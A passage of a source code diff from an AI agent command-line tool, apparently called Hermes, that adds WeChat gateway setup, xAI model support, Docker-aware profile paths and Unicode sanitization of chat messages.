if group_idx == 0:
save_env_value("WEIXIN_GROUP_POLICY", "disabled")
save_env_value("WEIXIN_GROUP_ALLOWED_USERS", "")
print_info(" Group chats disabled.")
elif group_idx == 1:
save_env_value("WEIXIN_GROUP_POLICY", "open")
save_env_value("WEIXIN_GROUP_ALLOWED_USERS", "")
print_warning(" All group chats enabled.")
else:
allow_groups = prompt(" Allowed group chat IDs (comma-separated)", "", password=False).replace(" ", "")
save_env_value("WEIXIN_GROUP_POLICY", "allowlist")
save_env_value("WEIXIN_GROUP_ALLOWED_USERS", allow_groups)
print_success(" Group allowlist saved.")
if user_id:
print()
if prompt_yes_no(f" Use your Weixin user ID ({user_id}) as the home channel?", True):
save_env_value("WEIXIN_HOME_CHANNEL", user_id)
print_success(f" Home channel set to {user_id}")
print()
print_success("Weixin configured!")
print_info(f" Account ID: {account_id}")
if user_id:
print_info(f" User ID: {user_id}")
def _setup_signal():
"""Interactive setup for Signal messenger."""
import shutil
@@ -2061,6 +2201,8 @@ def gateway_setup():
_setup_whatsapp()
elif platform["key"] == "signal":
_setup_signal()
elif platform["key"] == "weixin":
_setup_weixin()
else:
_setup_standard_platform(platform)
+42 -33
View File
@@ -97,10 +97,11 @@ def _apply_profile_override() -> None:
consume = 1
break
# 2. If no flag, check ~/.hermes/active_profile
# 2. If no flag, check active_profile in the hermes root
if profile_name is None:
try:
active_path = Path.home() / ".hermes" / "active_profile"
from hermes_constants import get_default_hermes_root
active_path = get_default_hermes_root() / "active_profile"
if active_path.exists():
name = active_path.read_text().strip()
if name and name != "default":
@@ -1672,6 +1673,8 @@ def _remove_custom_provider(config):
title="Select provider to remove:",
)
idx = menu.show()
from hermes_cli.curses_ui import flush_stdin
flush_stdin()
print()
except (ImportError, NotImplementedError, OSError, subprocess.SubprocessError):
for i, c in enumerate(choices, 1):
@@ -1697,8 +1700,9 @@ def _remove_custom_provider(config):
def _model_flow_named_custom(config, provider_info):
"""Handle a named custom provider from config.yaml custom_providers list.
If the entry has a saved model name, activates it immediately.
Otherwise probes the endpoint's /models API to let the user pick one.
Always probes the endpoint's /models API to let the user pick a model.
If a model was previously saved, it is pre-selected in the menu.
Falls back to the saved model if probing fails.
"""
from hermes_cli.auth import _save_model_choice, deactivate_provider
from hermes_cli.config import load_config, save_config
@@ -1709,46 +1713,37 @@ def _model_flow_named_custom(config, provider_info):
api_key = provider_info.get("api_key", "")
saved_model = provider_info.get("model", "")
# If a model is saved, just activate immediately — no probing needed
if saved_model:
_save_model_choice(saved_model)
cfg = load_config()
model = cfg.get("model")
if not isinstance(model, dict):
model = {"default": model} if model else {}
cfg["model"] = model
model["provider"] = "custom"
model["base_url"] = base_url
if api_key:
model["api_key"] = api_key
save_config(cfg)
deactivate_provider()
print(f"✅ Switched to: {saved_model}")
print(f" Provider: {name} ({base_url})")
return
# No saved model — probe endpoint and let user pick
print(f" Provider: {name}")
print(f" URL: {base_url}")
if saved_model:
print(f" Current: {saved_model}")
print()
print("No model saved for this provider. Fetching available models...")
print("Fetching available models...")
models = fetch_api_models(api_key, base_url, timeout=8.0)
if models:
default_idx = 0
if saved_model and saved_model in models:
default_idx = models.index(saved_model)
print(f"Found {len(models)} model(s):\n")
try:
from simple_term_menu import TerminalMenu
menu_items = [f" {m}" for m in models] + [" Cancel"]
menu_items = [
f" {m} (current)" if m == saved_model else f" {m}"
for m in models
] + [" Cancel"]
menu = TerminalMenu(
menu_items, cursor_index=0,
menu_items, cursor_index=default_idx,
menu_cursor="-> ", menu_cursor_style=("fg_green", "bold"),
menu_highlight_style=("fg_green",),
cycle_cursor=True, clear_screen=False,
title=f"Select model from {name}:",
)
idx = menu.show()
from hermes_cli.curses_ui import flush_stdin
flush_stdin()
print()
if idx is None or idx >= len(models):
print("Cancelled.")
@@ -1756,7 +1751,8 @@ def _model_flow_named_custom(config, provider_info):
model_name = models[idx]
except (ImportError, NotImplementedError, OSError, subprocess.SubprocessError):
for i, m in enumerate(models, 1):
print(f" {i}. {m}")
suffix = " (current)" if m == saved_model else ""
print(f" {i}. {m}{suffix}")
print(f" {len(models) + 1}. Cancel")
print()
try:
@@ -1772,6 +1768,13 @@ def _model_flow_named_custom(config, provider_info):
except (ValueError, KeyboardInterrupt, EOFError):
print("\nCancelled.")
return
elif saved_model:
print("Could not fetch models from endpoint.")
try:
model_name = input(f"Model name [{saved_model}]: ").strip() or saved_model
except (KeyboardInterrupt, EOFError):
print("\nCancelled.")
return
else:
print("Could not fetch models from endpoint. Enter model name manually.")
try:
@@ -1867,6 +1870,8 @@ def _prompt_reasoning_effort_selection(efforts, current_effort=""):
title="Select reasoning effort:",
)
idx = menu.show()
from hermes_cli.curses_ui import flush_stdin
flush_stdin()
if idx is None:
return None
print()
@@ -3309,10 +3314,11 @@ def _invalidate_update_cache():
``hermes update``, every profile is now current.
"""
homes = []
# Default profile home
default_home = Path.home() / ".hermes"
# Default profile home (Docker-aware — uses /opt/data in Docker)
from hermes_constants import get_default_hermes_root
default_home = get_default_hermes_root()
homes.append(default_home)
# Named profiles under ~/.hermes/profiles/
# Named profiles under <root>/profiles/
profiles_root = default_home / "profiles"
if profiles_root.is_dir():
for entry in profiles_root.iterdir():
@@ -4049,7 +4055,10 @@ def cmd_profile(args):
print(f" {name} chat Start chatting")
print(f" {name} gateway start Start the messaging gateway")
if clone or clone_all:
profile_dir_display = f"~/.hermes/profiles/{name}"
try:
profile_dir_display = "~/" + str(profile_dir.relative_to(Path.home()))
except ValueError:
profile_dir_display = str(profile_dir)
print(f"\n Edit {profile_dir_display}/.env for different API keys")
print(f" Edit {profile_dir_display}/SOUL.md for different personality")
print()
+62 -10
View File
@@ -76,17 +76,22 @@ _STRIP_VENDOR_ONLY_PROVIDERS: frozenset[str] = frozenset({
"copilot-acp",
})
# Providers whose own naming is authoritative -- pass through unchanged.
_PASSTHROUGH_PROVIDERS: frozenset[str] = frozenset({
# Providers whose native naming is authoritative -- pass through unchanged.
_AUTHORITATIVE_NATIVE_PROVIDERS: frozenset[str] = frozenset({
"gemini",
"huggingface",
"openai-codex",
})
# Direct providers that accept bare native names but should repair a matching
# provider/ prefix when users copy the aggregator form into config.yaml.
_MATCHING_PREFIX_STRIP_PROVIDERS: frozenset[str] = frozenset({
"zai",
"kimi-coding",
"minimax",
"minimax-cn",
"alibaba",
"qwen-oauth",
"huggingface",
"openai-codex",
"custom",
})
@@ -168,6 +173,40 @@ def _dots_to_hyphens(model_name: str) -> str:
return model_name.replace(".", "-")
def _normalize_provider_alias(provider_name: str) -> str:
"""Resolve provider aliases to Hermes' canonical ids."""
raw = (provider_name or "").strip().lower()
if not raw:
return raw
try:
from hermes_cli.models import normalize_provider
return normalize_provider(raw)
except Exception:
return raw
def _strip_matching_provider_prefix(model_name: str, target_provider: str) -> str:
"""Strip ``provider/`` only when the prefix matches the target provider.
This prevents arbitrary slash-bearing model IDs from being mangled on
native providers while still repairing manual config values like
``zai/glm-5.1`` for the ``zai`` provider.
"""
if "/" not in model_name:
return model_name
prefix, remainder = model_name.split("/", 1)
if not prefix.strip() or not remainder.strip():
return model_name
normalized_prefix = _normalize_provider_alias(prefix)
normalized_target = _normalize_provider_alias(target_provider)
if normalized_prefix and normalized_prefix == normalized_target:
return remainder.strip()
return model_name
def detect_vendor(model_name: str) -> Optional[str]:
"""Detect the vendor slug from a bare model name.
@@ -305,24 +344,37 @@ def normalize_model_for_provider(model_input: str, target_provider: str) -> str:
if not name:
return name
provider = (target_provider or "").strip().lower()
provider = _normalize_provider_alias(target_provider)
# --- Aggregators: need vendor/model format ---
if provider in _AGGREGATOR_PROVIDERS:
return _prepend_vendor(name)
# --- Anthropic / OpenCode: strip vendor, dots -> hyphens ---
# --- Anthropic / OpenCode: strip matching provider prefix, dots -> hyphens ---
if provider in _DOT_TO_HYPHEN_PROVIDERS:
bare = _strip_vendor_prefix(name)
bare = _strip_matching_provider_prefix(name, provider)
if "/" in bare:
return bare
return _dots_to_hyphens(bare)
# --- Copilot: strip vendor, keep dots ---
# --- Copilot: strip matching provider prefix, keep dots ---
if provider in _STRIP_VENDOR_ONLY_PROVIDERS:
return _strip_vendor_prefix(name)
return _strip_matching_provider_prefix(name, provider)
# --- DeepSeek: map to one of two canonical names ---
if provider == "deepseek":
return _normalize_for_deepseek(name)
bare = _strip_matching_provider_prefix(name, provider)
if "/" in bare:
return bare
return _normalize_for_deepseek(bare)
# --- Direct providers: repair matching provider prefixes only ---
if provider in _MATCHING_PREFIX_STRIP_PROVIDERS:
return _strip_matching_provider_prefix(name, provider)
# --- Authoritative native providers: preserve user-facing slugs as-is ---
if provider in _AUTHORITATIVE_NATIVE_PROVIDERS:
return name
# --- Custom & all others: pass through as-is ---
return name
+35 -8
View File
@@ -809,42 +809,69 @@ def list_authenticated_providers(
})
seen_slugs.add(slug)
# --- 2. Check Hermes-only providers (nous, openai-codex, copilot) ---
# --- 2. Check Hermes-only providers (nous, openai-codex, copilot, opencode-go) ---
from hermes_cli.providers import HERMES_OVERLAYS
from hermes_cli.auth import PROVIDER_REGISTRY as _auth_registry
# Build reverse mapping: models.dev ID → Hermes provider ID.
# HERMES_OVERLAYS keys may be models.dev IDs (e.g. "github-copilot")
# while _PROVIDER_MODELS and config.yaml use Hermes IDs ("copilot").
_mdev_to_hermes = {v: k for k, v in PROVIDER_TO_MODELS_DEV.items()}
for pid, overlay in HERMES_OVERLAYS.items():
if pid in seen_slugs:
continue
# Resolve Hermes slug — e.g. "github-copilot" → "copilot"
hermes_slug = _mdev_to_hermes.get(pid, pid)
if hermes_slug in seen_slugs:
continue
# Check if credentials exist
has_creds = False
if overlay.extra_env_vars:
has_creds = any(os.environ.get(ev) for ev in overlay.extra_env_vars)
if overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
# Also check api_key_env_vars from PROVIDER_REGISTRY for api_key auth_type
if not has_creds and overlay.auth_type == "api_key":
for _key in (pid, hermes_slug):
pcfg = _auth_registry.get(_key)
if pcfg and pcfg.api_key_env_vars:
if any(os.environ.get(ev) for ev in pcfg.api_key_env_vars):
has_creds = True
break
if not has_creds and overlay.auth_type in ("oauth_device_code", "oauth_external", "external_process"):
# These use auth stores, not env vars — check for auth.json entries
try:
from hermes_cli.auth import _load_auth_store
store = _load_auth_store()
if store and (pid in store.get("providers", {}) or pid in store.get("credential_pool", {})):
providers_store = store.get("providers", {})
pool_store = store.get("credential_pool", {})
if store and (
pid in providers_store or hermes_slug in providers_store
or pid in pool_store or hermes_slug in pool_store
):
has_creds = True
except Exception as exc:
logger.debug("Auth store check failed for %s: %s", pid, exc)
if not has_creds:
continue
# Use curated list
model_ids = curated.get(pid, [])
# Use curated list — look up by Hermes slug, fall back to overlay key
model_ids = curated.get(hermes_slug, []) or curated.get(pid, [])
total = len(model_ids)
top = model_ids[:max_models]
results.append({
"slug": pid,
"name": get_label(pid),
"is_current": pid == current_provider,
"slug": hermes_slug,
"name": get_label(hermes_slug),
"is_current": hermes_slug == current_provider or pid == current_provider,
"is_user_defined": False,
"models": top,
"total_models": total,
"source": "hermes",
})
seen_slugs.add(pid)
seen_slugs.add(hermes_slug)
# --- 3. User-defined endpoints from config ---
if user_providers and isinstance(user_providers, dict):
+13
View File
@@ -129,6 +129,19 @@ _PROVIDER_MODELS: dict[str, list[str]] = {
"glm-4.5",
"glm-4.5-flash",
],
"xai": [
"grok-4.20-0309-reasoning",
"grok-4.20-0309-non-reasoning",
"grok-4.20-multi-agent-0309",
"grok-4-1-fast-reasoning",
"grok-4-1-fast-non-reasoning",
"grok-4-fast-reasoning",
"grok-4-fast-non-reasoning",
"grok-4-0709",
"grok-code-fast-1",
"grok-3",
"grok-3-mini",
],
"kimi-coding": [
"kimi-for-coding",
"kimi-k2.5",
+21 -6
View File
@@ -42,6 +42,11 @@ _PROFILE_DIRS = [
"plans",
"workspace",
"cron",
# Per-profile HOME for subprocesses: isolates system tool configs (git,
# ssh, gh, npm …) so credentials don't bleed between profiles. In Docker
# this also ensures tool configs land inside the persistent volume.
# See hermes_constants.get_subprocess_home() and issue #4426.
"home",
]
# Files copied during --clone (if they exist in the source)
@@ -115,16 +120,26 @@ _HERMES_SUBCOMMANDS = frozenset({
def _get_profiles_root() -> Path:
"""Return the directory where named profiles are stored.
Always ``~/.hermes/profiles/`` anchored to the user's home,
NOT to the current HERMES_HOME (which may itself be a profile).
This ensures ``coder profile list`` can see all profiles.
Anchored to the hermes root, NOT to the current HERMES_HOME
(which may itself be a profile). This ensures ``coder profile list``
can see all profiles.
In Docker/custom deployments where HERMES_HOME points outside
``~/.hermes``, profiles live under ``HERMES_HOME/profiles/`` so
they persist on the mounted volume.
"""
return Path.home() / ".hermes" / "profiles"
return _get_default_hermes_home() / "profiles"
def _get_default_hermes_home() -> Path:
"""Return the default (pre-profile) HERMES_HOME path."""
return Path.home() / ".hermes"
"""Return the default (pre-profile) HERMES_HOME path.
In standard deployments this is ``~/.hermes``.
In Docker/custom deployments where HERMES_HOME is outside ``~/.hermes``
(e.g. ``/opt/data``), returns HERMES_HOME directly.
"""
from hermes_constants import get_default_hermes_root
return get_default_hermes_root()
def _get_active_profile_path() -> Path:
+10
View File
@@ -127,6 +127,11 @@ HERMES_OVERLAYS: Dict[str, HermesOverlay] = {
is_aggregator=True,
base_url_env_var="HF_BASE_URL",
),
"xai": HermesOverlay(
transport="openai_chat",
base_url_override="https://api.x.ai/v1",
base_url_env_var="XAI_BASE_URL",
),
}
@@ -163,6 +168,10 @@ ALIASES: Dict[str, str] = {
"z.ai": "zai",
"zhipu": "zai",
# xai
"x-ai": "xai",
"x.ai": "xai",
# kimi-for-coding (models.dev ID)
"kimi": "kimi-for-coding",
"kimi-coding": "kimi-for-coding",
@@ -341,6 +350,7 @@ def get_label(provider_id: str) -> str:
def is_aggregator(provider: str) -> bool:
"""Return True when the provider is a multi-model aggregator."""
pdef = get_provider(provider)
+9
View File
@@ -338,6 +338,8 @@ def _curses_prompt_choice(question: str, choices: list, default: int = 0) -> int
return
curses.wrapper(_curses_menu)
from hermes_cli.curses_ui import flush_stdin
flush_stdin()
return result_holder[0]
except Exception:
return -1
@@ -2028,6 +2030,12 @@ def _setup_whatsapp():
print_info("or personal self-chat) and pair via QR code.")
def _setup_weixin():
"""Configure Weixin (personal WeChat) via iLink Bot API QR login."""
from hermes_cli.gateway import _setup_weixin as _gateway_setup_weixin
_gateway_setup_weixin()
def _setup_bluebubbles():
"""Configure BlueBubbles iMessage gateway."""
print_header("BlueBubbles (iMessage)")
@@ -2147,6 +2155,7 @@ _GATEWAY_PLATFORMS = [
("Matrix", "MATRIX_ACCESS_TOKEN", _setup_matrix),
("Mattermost", "MATTERMOST_TOKEN", _setup_mattermost),
("WhatsApp", "WHATSAPP_ENABLED", _setup_whatsapp),
("Weixin (WeChat)", "WEIXIN_ACCOUNT_ID", _setup_weixin),
("BlueBubbles (iMessage)", "BLUEBUBBLES_SERVER_URL", _setup_bluebubbles),
("Webhooks (GitHub, GitLab, etc.)", "WEBHOOK_ENABLED", _setup_webhooks),
]
+1
View File
@@ -31,6 +31,7 @@ PLATFORMS = {
"dingtalk": "💬 DingTalk",
"feishu": "🪽 Feishu",
"wecom": "💬 WeCom",
"weixin": "💬 Weixin",
"webhook": "🔗 Webhook",
}
+27 -24
View File
@@ -151,7 +151,8 @@ def do_search(query: str, source: str = "all", limit: int = 10,
auth = GitHubAuth()
sources = create_source_router(auth)
results = unified_search(query, sources, source_filter=source, limit=limit)
with c.status("[bold]Searching registries..."):
results = unified_search(query, sources, source_filter=source, limit=limit)
if not results:
c.print("[dim]No skills found matching your query.[/]\n")
@@ -187,7 +188,7 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
Official skills are always shown first, regardless of source filter.
"""
from tools.skills_hub import (
GitHubAuth, create_source_router,
GitHubAuth, create_source_router, parallel_search_sources,
)
# Clamp page_size to safe range
@@ -198,27 +199,23 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
auth = GitHubAuth()
sources = create_source_router(auth)
# Collect results from all (or filtered) sources
# Use empty query to get everything; per-source limits prevent overload
# Collect results from all (or filtered) sources in parallel.
# Per-source limits are generous — parallelism + 30s timeout cap prevents hangs.
_TRUST_RANK = {"builtin": 3, "trusted": 2, "community": 1}
_PER_SOURCE_LIMIT = {"official": 100, "skills-sh": 100, "well-known": 25, "github": 100, "clawhub": 50,
"claude-marketplace": 50, "lobehub": 50}
_PER_SOURCE_LIMIT = {
"official": 200, "skills-sh": 200, "well-known": 50,
"github": 200, "clawhub": 500, "claude-marketplace": 100,
"lobehub": 500,
}
all_results: list = []
source_counts: dict = {}
for src in sources:
sid = src.source_id()
if source != "all" and sid != source and sid != "official":
# Always include official source for the "first" placement
continue
try:
limit = _PER_SOURCE_LIMIT.get(sid, 50)
results = src.search("", limit=limit)
source_counts[sid] = len(results)
all_results.extend(results)
except Exception:
continue
with c.status("[bold]Fetching skills from registries..."):
all_results, source_counts, timed_out = parallel_search_sources(
sources,
query="",
per_source_limits=_PER_SOURCE_LIMIT,
source_filter=source,
overall_timeout=30,
)
if not all_results:
c.print("[dim]No skills found in the Skills Hub.[/]\n")
@@ -252,8 +249,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
# Build header
source_label = f"{source}" if source != "all" else "— all sources"
loaded_label = f"{total} skills loaded"
if timed_out:
loaded_label += f", {len(timed_out)} source(s) still loading"
c.print(f"\n[bold]Skills Hub — Browse {source_label}[/]"
f" [dim]({total} skills, page {page}/{total_pages})[/]")
f" [dim]({loaded_label}, page {page}/{total_pages})[/]")
if official_count > 0 and page == 1:
c.print(f"[bright_cyan]★ {official_count} official optional skill(s) from Nous Research[/]")
c.print()
@@ -300,8 +300,11 @@ def do_browse(page: int = 1, page_size: int = 20, source: str = "all",
parts = [f"{sid}: {ct}" for sid, ct in sorted(source_counts.items())]
c.print(f" [dim]Sources: {', '.join(parts)}[/]")
c.print("[dim]Use: hermes skills inspect <identifier> to preview, "
"hermes skills install <identifier> to install[/]\n")
if timed_out:
c.print(f" [yellow]⚡ Slow sources skipped: {', '.join(timed_out)} "
f"— run again for cached results[/]")
c.print("[dim]Tip: 'hermes skills search <query>' searches deeper across all registries[/]\n")
def do_install(identifier: str, category: str = "", force: bool = False,
+1
View File
@@ -305,6 +305,7 @@ def show_status(args):
"DingTalk": ("DINGTALK_CLIENT_ID", None),
"Feishu": ("FEISHU_APP_ID", "FEISHU_HOME_CHANNEL"),
"WeCom": ("WECOM_BOT_ID", "WECOM_HOME_CHANNEL"),
"Weixin": ("WEIXIN_ACCOUNT_ID", "WEIXIN_HOME_CHANNEL"),
"BlueBubbles": ("BLUEBUBBLES_SERVER_URL", "BLUEBUBBLES_HOME_CHANNEL"),
}
+3
View File
@@ -133,6 +133,7 @@ PLATFORMS = {
"dingtalk": {"label": "💬 DingTalk", "default_toolset": "hermes-dingtalk"},
"feishu": {"label": "🪽 Feishu", "default_toolset": "hermes-feishu"},
"wecom": {"label": "💬 WeCom", "default_toolset": "hermes-wecom"},
"weixin": {"label": "💬 Weixin", "default_toolset": "hermes-weixin"},
"api_server": {"label": "🌐 API Server", "default_toolset": "hermes-api-server"},
"mattermost": {"label": "💬 Mattermost", "default_toolset": "hermes-mattermost"},
"webhook": {"label": "🔗 Webhook", "default_toolset": "hermes-webhook"},
@@ -720,6 +721,8 @@ def _prompt_choice(question: str, choices: list, default: int = 0) -> int:
return
curses.wrapper(_curses_menu)
from hermes_cli.curses_ui import flush_stdin
flush_stdin()
return result_holder[0]
except Exception:
+65
View File
@@ -17,6 +17,45 @@ def get_hermes_home() -> Path:
return Path(os.getenv("HERMES_HOME", Path.home() / ".hermes"))
def get_default_hermes_root() -> Path:
"""Return the root Hermes directory for profile-level operations.
In standard deployments this is ``~/.hermes``.
In Docker or custom deployments where ``HERMES_HOME`` points outside
``~/.hermes`` (e.g. ``/opt/data``), returns ``HERMES_HOME`` directly
that IS the root.
In profile mode where ``HERMES_HOME`` is ``<root>/profiles/<name>``,
returns ``<root>`` so that ``profile list`` can see all profiles.
Works both for standard (``~/.hermes/profiles/coder``) and Docker
(``/opt/data/profiles/coder``) layouts.
Import-safe no dependencies beyond stdlib.
"""
native_home = Path.home() / ".hermes"
env_home = os.environ.get("HERMES_HOME", "")
if not env_home:
return native_home
env_path = Path(env_home)
try:
env_path.resolve().relative_to(native_home.resolve())
# HERMES_HOME is under ~/.hermes (normal or profile mode)
return native_home
except ValueError:
pass
# Docker / custom deployment.
# Check if this is a profile path: <root>/profiles/<name>
# If the immediate parent dir is named "profiles", the root is
# the grandparent — this covers Docker profiles correctly.
if env_path.parent.name == "profiles":
return env_path.parent.parent
# Not a profile path — HERMES_HOME itself is the root
return env_path
def get_optional_skills_dir(default: Path | None = None) -> Path:
"""Return the optional-skills directory, honoring package-manager wrappers.
@@ -72,6 +111,32 @@ def display_hermes_home() -> str:
return str(home)
def get_subprocess_home() -> str | None:
"""Return a per-profile HOME directory for subprocesses, or None.
When ``{HERMES_HOME}/home/`` exists on disk, subprocesses should use it
as ``HOME`` so system tools (git, ssh, gh, npm ) write their configs
inside the Hermes data directory instead of the OS-level ``/root`` or
``~/``. This provides:
* **Docker persistence** tool configs land inside the persistent volume.
* **Profile isolation** each profile gets its own git identity, SSH
keys, gh tokens, etc.
The Python process's own ``os.environ["HOME"]`` and ``Path.home()`` are
**never** modified only subprocess environments should inject this value.
Activation is directory-based: if the ``home/`` subdirectory doesn't
exist, returns ``None`` and behavior is unchanged.
"""
hermes_home = os.getenv("HERMES_HOME")
if not hermes_home:
return None
profile_home = os.path.join(hermes_home, "home")
if os.path.isdir(profile_home):
return profile_home
return None
VALID_REASONING_EFFORTS = ("minimal", "low", "medium", "high", "xhigh")
+145 -21
View File
@@ -359,8 +359,9 @@ def _sanitize_surrogates(text: str) -> str:
def _sanitize_messages_surrogates(messages: list) -> bool:
"""Sanitize surrogate characters from all string content in a messages list.
Walks message dicts in-place. Returns True if any surrogates were found
and replaced, False otherwise.
Walks message dicts in-place. Returns True if any surrogates were found
and replaced, False otherwise. Covers content/text, name, and tool call
metadata/arguments so retries don't fail on a non-content field.
"""
found = False
for msg in messages:
@@ -377,6 +378,88 @@ def _sanitize_messages_surrogates(messages: list) -> bool:
if isinstance(text, str) and _SURROGATE_RE.search(text):
part["text"] = _SURROGATE_RE.sub('\ufffd', text)
found = True
name = msg.get("name")
if isinstance(name, str) and _SURROGATE_RE.search(name):
msg["name"] = _SURROGATE_RE.sub('\ufffd', name)
found = True
tool_calls = msg.get("tool_calls")
if isinstance(tool_calls, list):
for tc in tool_calls:
if not isinstance(tc, dict):
continue
tc_id = tc.get("id")
if isinstance(tc_id, str) and _SURROGATE_RE.search(tc_id):
tc["id"] = _SURROGATE_RE.sub('\ufffd', tc_id)
found = True
fn = tc.get("function")
if isinstance(fn, dict):
fn_name = fn.get("name")
if isinstance(fn_name, str) and _SURROGATE_RE.search(fn_name):
fn["name"] = _SURROGATE_RE.sub('\ufffd', fn_name)
found = True
fn_args = fn.get("arguments")
if isinstance(fn_args, str) and _SURROGATE_RE.search(fn_args):
fn["arguments"] = _SURROGATE_RE.sub('\ufffd', fn_args)
found = True
return found
def _strip_non_ascii(text: str) -> str:
"""Remove non-ASCII characters, replacing with closest ASCII equivalent or removing.
Used as a last resort when the system encoding is ASCII and can't handle
any non-ASCII characters (e.g. LANG=C on Chromebooks).
"""
return text.encode('ascii', errors='ignore').decode('ascii')
def _sanitize_messages_non_ascii(messages: list) -> bool:
"""Strip non-ASCII characters from all string content in a messages list.
This is a last-resort recovery for systems with ASCII-only encoding
(LANG=C, Chromebooks, minimal containers). Returns True if any
non-ASCII content was found and sanitized.
"""
found = False
for msg in messages:
if not isinstance(msg, dict):
continue
# Sanitize content (string)
content = msg.get("content")
if isinstance(content, str):
sanitized = _strip_non_ascii(content)
if sanitized != content:
msg["content"] = sanitized
found = True
elif isinstance(content, list):
for part in content:
if isinstance(part, dict):
text = part.get("text")
if isinstance(text, str):
sanitized = _strip_non_ascii(text)
if sanitized != text:
part["text"] = sanitized
found = True
# Sanitize name field (can contain non-ASCII in tool results)
name = msg.get("name")
if isinstance(name, str):
sanitized = _strip_non_ascii(name)
if sanitized != name:
msg["name"] = sanitized
found = True
# Sanitize tool_calls
tool_calls = msg.get("tool_calls")
if isinstance(tool_calls, list):
for tc in tool_calls:
if isinstance(tc, dict):
fn = tc.get("function", {})
if isinstance(fn, dict):
fn_args = fn.get("arguments")
if isinstance(fn_args, str):
sanitized = _strip_non_ascii(fn_args)
if sanitized != fn_args:
fn["arguments"] = sanitized
found = True
return found
@@ -606,6 +689,17 @@ class AIAgent:
else:
self.api_mode = "chat_completions"
try:
from hermes_cli.model_normalize import (
_AGGREGATOR_PROVIDERS,
normalize_model_for_provider,
)
if self.provider not in _AGGREGATOR_PROVIDERS:
self.model = normalize_model_for_provider(self.model, self.provider)
except Exception:
pass
# Direct OpenAI sessions use the Responses API path. GPT-5.x tool
# calls with reasoning are rejected on /v1/chat/completions, and
# Hermes is a tool-using client by default.
@@ -853,6 +947,7 @@ class AIAgent:
client_kwargs["default_headers"] = headers
self.api_key = client_kwargs.get("api_key", "")
self.base_url = client_kwargs.get("base_url", self.base_url)
try:
self.client = self._create_openai_client(client_kwargs, reason="agent_init", shared=True)
if not self.quiet_mode:
@@ -1149,6 +1244,9 @@ class AIAgent:
except (TypeError, ValueError):
_config_context_length = None
# Store for reuse in switch_model (so config override persists across model switches)
self._config_context_length = _config_context_length
# Check custom_providers per-model context_length
if _config_context_length is None:
_custom_providers = _agent_cfg.get("custom_providers")
@@ -1386,6 +1484,7 @@ class AIAgent:
base_url=self.base_url,
api_key=self.api_key,
provider=self.provider,
config_context_length=getattr(self, "_config_context_length", None),
)
self.context_compressor.model = self.model
self.context_compressor.base_url = self.base_url
@@ -2922,7 +3021,7 @@ class AIAgent:
@staticmethod
def _cap_delegate_task_calls(tool_calls: list) -> list:
"""Truncate excess delegate_task calls to MAX_CONCURRENT_CHILDREN.
"""Truncate excess delegate_task calls to max_concurrent_children.
The delegate_tool caps the task list inside a single call, but the
model can emit multiple separate delegate_task tool_calls in one
@@ -2930,23 +3029,24 @@ class AIAgent:
Returns the original list if no truncation was needed.
"""
from tools.delegate_tool import MAX_CONCURRENT_CHILDREN
from tools.delegate_tool import _get_max_concurrent_children
max_children = _get_max_concurrent_children()
delegate_count = sum(1 for tc in tool_calls if tc.function.name == "delegate_task")
if delegate_count <= MAX_CONCURRENT_CHILDREN:
if delegate_count <= max_children:
return tool_calls
kept_delegates = 0
truncated = []
for tc in tool_calls:
if tc.function.name == "delegate_task":
if kept_delegates < MAX_CONCURRENT_CHILDREN:
if kept_delegates < max_children:
truncated.append(tc)
kept_delegates += 1
else:
truncated.append(tc)
logger.warning(
"Truncated %d excess delegate_task call(s) to enforce "
"MAX_CONCURRENT_CHILDREN=%d limit",
delegate_count - MAX_CONCURRENT_CHILDREN, MAX_CONCURRENT_CHILDREN,
"max_concurrent_children=%d limit",
delegate_count - max_children, max_children,
)
return truncated
@@ -5005,7 +5105,7 @@ class AIAgent:
# when no explicit key is in the fallback config.
if fb_base_url_hint and "ollama.com" in fb_base_url_hint.lower() and not fb_api_key_hint:
fb_api_key_hint = os.getenv("OLLAMA_API_KEY") or None
fb_client, _ = resolve_provider_client(
fb_client, _resolved_fb_model = resolve_provider_client(
fb_provider, model=fb_model, raw_codex=True,
explicit_base_url=fb_base_url_hint,
explicit_api_key=fb_api_key_hint)
@@ -5014,6 +5114,12 @@ class AIAgent:
"Fallback to %s failed: provider not configured",
fb_provider)
return self._try_activate_fallback() # try next in chain
try:
from hermes_cli.model_normalize import normalize_model_for_provider
fb_model = normalize_model_for_provider(fb_model, fb_provider)
except Exception:
pass
# Determine api_mode from provider / base URL
fb_api_mode = "chat_completions"
@@ -5498,7 +5604,7 @@ class AIAgent:
preserve_dots=self._anthropic_preserve_dots(),
context_length=ctx_len,
base_url=getattr(self, "_anthropic_base_url", None),
fast_mode=self.request_overrides.get("speed") == "fast",
fast_mode=(self.request_overrides or {}).get("speed") == "fast",
)
if self.api_mode == "codex_responses":
@@ -7162,7 +7268,7 @@ class AIAgent:
self._thinking_prefill_retries = 0
self._last_content_with_tools = None
self._mute_post_response = False
self._surrogate_sanitized = False
self._unicode_sanitization_passes = 0
# Pre-turn connection health check: detect and clean up dead TCP
# connections left over from provider outages or dropped streams.
@@ -8147,22 +8253,40 @@ class AIAgent:
self.thinking_callback("")
# -----------------------------------------------------------
# Surrogate character recovery. UnicodeEncodeError happens
# when the messages contain lone surrogates (U+D800..U+DFFF)
# that are invalid UTF-8. Common source: clipboard paste
# from Google Docs or similar rich-text editors. We sanitize
# the entire messages list in-place and retry once.
# UnicodeEncodeError recovery. Two common causes:
# 1. Lone surrogates (U+D800..U+DFFF) from clipboard paste
# (Google Docs, rich-text editors) — sanitize and retry.
# 2. ASCII codec on systems with LANG=C or non-UTF-8 locale
# (e.g. Chromebooks) — any non-ASCII character fails.
# Detect via the error message mentioning 'ascii' codec.
# We sanitize messages in-place and may retry twice:
# first to strip surrogates, then once more for pure
# ASCII-only locale sanitization if needed.
# -----------------------------------------------------------
if isinstance(api_error, UnicodeEncodeError) and not getattr(self, '_surrogate_sanitized', False):
self._surrogate_sanitized = True
if _sanitize_messages_surrogates(messages):
if isinstance(api_error, UnicodeEncodeError) and getattr(self, '_unicode_sanitization_passes', 0) < 2:
_err_str = str(api_error).lower()
_is_ascii_codec = "'ascii'" in _err_str or "ascii" in _err_str
_surrogates_found = _sanitize_messages_surrogates(messages)
if _surrogates_found:
self._unicode_sanitization_passes += 1
self._vprint(
f"{self.log_prefix}⚠️ Stripped invalid surrogate characters from messages. Retrying...",
force=True,
)
continue
